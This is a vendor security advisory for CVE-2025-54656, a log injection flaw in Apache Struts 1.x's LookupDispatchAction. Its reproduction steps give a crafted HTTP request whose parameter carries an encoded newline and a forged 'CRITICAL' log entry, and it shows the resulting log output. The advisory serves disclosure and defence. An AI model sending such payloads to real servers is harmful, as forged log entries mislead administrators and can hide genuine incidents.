By clicking "Accept", you agree to the storing of cookies on your device to enhance site navigation, analyze site usage, and assist in our marketing efforts. View our Privacy Policy for more information.

PreferencesRejectAccept
Manage Consent Preferences by Category
Essentials
Always active

Necessary for the site to function. Always On.

Used for targeted advertising.

Remembers your preferences and provides enhanced features.

Measures usage and improves your experience.

Reject AllAccept All
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
View all Vulnerabilities

CVE-2025-54656

Log Injection
Affects
Apache Struts
in
Struts
No items found.
Versions
>=1.2.9 <=1.3.10
Exclamation circle icon
Patch Available

This Vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs

View NES Solution

Overview

Apache Struts is a popular open-source web application framework for developing Java EE web applications. It provides robust support for creating modern Java-based enterprise applications. 

A Improper Output Neutralization for Logs vulnerability (CVE-2025-54656) has been identified in Apache Struts. This vulnerability allows attackers to inject untrusted input into log files without proper filtering, potentially misleading consumers of the logs.

Per OWASP: Applications use log files to track events for review, analysis, or debugging. If unvalidated user input is written to logs, attackers can exploit this to perform log injection—inserting fake log entries or malicious content. This can result in misleading logs (log forging) or even trigger attacks like XSS if the logs are viewed in vulnerable systems.

This issue affects multiple versions of Apache Struts.

Details

Module Info

Vulnerability Info

The getLookupMapName method in the LookupDispatchAction class in Struts writes unsanitized user input (keyName) directly to log entries when the lookupMap does not contain the provided key. A malicious user can exploit this behavior by submitting a crafted keyName parameter, resulting in forged or misleading log entries.

Steps To Reproduce

1. Setup a LookupDispatchAction, or use the examples web app from Struts 1.3.10.

2. Craft an HTTP request to demonstrate the vulnerability:

POST /examples/dispatch/lookup-submit.do HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded

dispatchParam=fob.bar'%0A16-Jul-2025 16:13:57.670 CRITICAL [http-nio-8080-exec-6] org.apache.struts.actions.DispatchAction 'SHUTDOWN INITIALIZED

3. Check the logs. The new line %0A in the dispatchParam value causes a forged log entry to appear as if it originated from the application itself. This demonstrates how an attacker can inject misleading log entries, potentially masking real events or creating confusion during log analysis.

16-Jul-2025 16:13:56.869 SEVERE [http-nio-8080-exec-9] org.apache.struts.actions.LookupDispatchAction.getLookupMapName Action[/lookup-submit] missing resource in key method map 'fob.bar'
16-Jul-2025 16:13:57.670 CRITICAL [http-nio-8080-exec-6] org.apache.struts.actions.DispatchAction 'SHUTDOWN INITIALIZED'

Mitigation

Users of the affected components should apply one of the following mitigations:

  • Upgrade to patched Apache Struts 2
  • Leverage a commercial support partner like HeroDevs for post-EOL security support.

Credit

  • Ryan Murphy of HeroDevs

Pink arrow
Pink arrow
CVE-2014-0094
CVE-2016-3081
CVE-2017-5638
CVE-2018-11776
CVE-2012-1007
CVE-2015-0899
CVE-2016-1181
CVE-2016-1182
CVE-2014-0114
CVE-2024-53677
CVE-2006-1546
CVE-2006-1547
CVE-2006-1548
CVE-2008-2025
CVE-2023-34396
CVE-2023-49735
CVE-2005-3745
CVE-2025-48976
CVE-2025-48734
CVE-2025-54656
What is a HeroDevs Security Advisory?
Vulnerability Details
ID
CVE-2025-54656
PROJECT Affected
Apache Struts
Versions Affected
>=1.2.9 <=1.3.10
Published date
August 4, 2025
≈ Fix date
August 4, 2025
Fixed in
NES for Apache Struts
Severity
Level
CVSS Assessment
Low
>=0 <4
Medium
>=4 <6
High
>=6 <8
Critical
>=8 <10
Low
Category
Log Injection
Sign up for the latest vulnerability alerts fixed in
NES for Apache Struts
Rss feed icon
Subscribe via RSS
or

By clicking “submit” I acknowledge receipt of our Privacy Policy.

Thanks for signing up for our Newsletter! We look forward to connecting with you.
Oops! Something went wrong while submitting the form.